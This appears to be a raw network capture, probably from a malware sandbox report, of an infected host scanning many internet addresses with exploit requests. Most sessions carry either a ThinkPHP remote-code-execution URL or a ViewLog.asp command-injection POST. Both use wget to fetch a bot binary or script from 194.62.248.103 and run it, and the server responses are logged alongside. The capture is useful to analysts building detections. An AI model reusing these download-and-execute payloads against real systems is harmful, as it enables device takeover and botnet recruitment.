                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.235977495.101.21.1280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:03.936918974 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.227490902 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 35 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 30 34 26 23 34 36 3b 32 32 63 37 37 34 62 37 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 31 35 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 30 34 26 23 34 36 3b 32 32 63 37 37 34 62 37 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c15655f&#46;1713105304&#46;22c774b7<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;c15655f&#46;1713105304&#46;22c774b7</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.234798895.163.56.17080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:03.995321989 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.332767963 CEST387INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        X-XSS-Protection: 0
                                                        X-Host: apif23.i.mail.ru
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.234020431.12.75.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.047811985 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.235918088.208.0.18780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.271327972 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.576109886 CEST678INHTTP/1.1 301 Moved Permanently
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Server: Apache/2.2.31 (Unix) PHP/5.5.37 mod_ssl/2.2.31 OpenSSL/1.0.2j
                                                        Location: https://3d3dporn.com/index.php?s=/index/
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Content-Length: 302
                                                        Keep-Alive: timeout=10, max=120
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 50 4d 4b 03 31 10 bd ef af 18 f7 a4 07 33 fb 41 51 4a 1a d1 b6 d2 42 b5 0b dd 1e 44 44 62 33 9a 95 dd 4d c8 c6 d2 fe 7b b3 6d 45 0f 5e 86 99 f7 de f0 1e 8f 9f 4d 96 e3 f2 a9 98 c2 ac 7c 58 40 b1 be 5b cc c7 10 5f 22 ce a7 e5 3d e2 a4 9c 1c 99 8c 25 88 d3 c7 58 44 5c fb a6 16 5c 93 54 e1 f0 95 af 49 e4 49 0a 0f 66 4b 0a 0a 72 8d 6c a9 f5 f5 9e e3 91 8c 38 1e c4 fc cd a8 7d ff 9f 8a 7f b4 01 8d b8 15 a5 26 50 66 f3 d5 04 18 b4 ec a0 39 48 b9 04 ed e8 7d 14 6b ef 6d 37 44 cc 55 ae ac 71 2d db 98 06 ab 56 d1 8e 59 6d 6f ba d1 f1 c0 58 68 72 c4 51 0a c6 d1 f6 ae 2e 0c a9 94 a3 ae 13 b7 56 6e 34 61 c6 32 96 a7 70 be 6e ab dd 05 14 b3 02 07 6c c0 f2 ab 60 aa 5e bb ae fe 11 2c 2d b5 ab d5 02 53 96 b0 ec 13 56 e4 b6 e4 40 fa df 58 8d ac 6a 6f 86 cf ad 81 93 07 7c 54 5b 6a 5f 62 f1 37 69 9f 07 0a e3 3c 5c 27 61 3f a5 09 05 1d aa 09 25 f4 d5 46 df 6b b2 2c 33 95 01 00 00
                                                        Data Ascii: mPMK13AQJBDDb3M{mE^M|X@[_"=%XD\\TIIfKrl8}&Pf9H}km7DUq-VYmoXhrQ.Vn4a2pnl`^,-SV@Xjo|T[j_b7i<\'a?%Fk,3


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.235740688.153.60.6880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.281882048 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.596780062 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:44:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.234204495.239.77.16180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.281881094 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.629741907 CEST289INHTTP/1.1 404 Not Found
                                                        CONNECTION: close
                                                        CONTENT-LENGTH: 48
                                                        X-XSS-Protection: 1;mode=block
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        X-Content-Type-Options: nosniff
                                                        CONTENT-TYPE: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.233547288.112.224.19080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.322200060 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:04.934376001 CEST64INHTTP/1.1 400 Bad Request
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.234621095.18.173.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.348413944 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:04.651024103 CEST642INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Server: Apache/2.4.57 (Raspbian)
                                                        Content-Length: 446
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6f 72 61 73 33 31 2e 64 64 6e 73 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.57 (Raspbian) Server at boras31.ddns.net Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.234881085.54.85.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.380527973 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.235636862.29.91.38080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.387887001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.234216662.29.26.2168080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.390572071 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.235955431.131.139.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.398190022 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:04.748996019 CEST334INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:35:04 GMT
                                                        Connection: Close
                                                        Cache-Control: no-store
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: DENY
                                                        Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.233499494.72.141.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:04.977591038 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:05.314939976 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.235558695.164.4.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.014902115 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.233440694.122.71.1418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.016688108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.233934094.123.113.378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.016763926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.234485631.200.26.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.016917944 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.234650262.152.21.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:05.057058096 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:09.252460957 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:15.395483971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:27.425827980 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
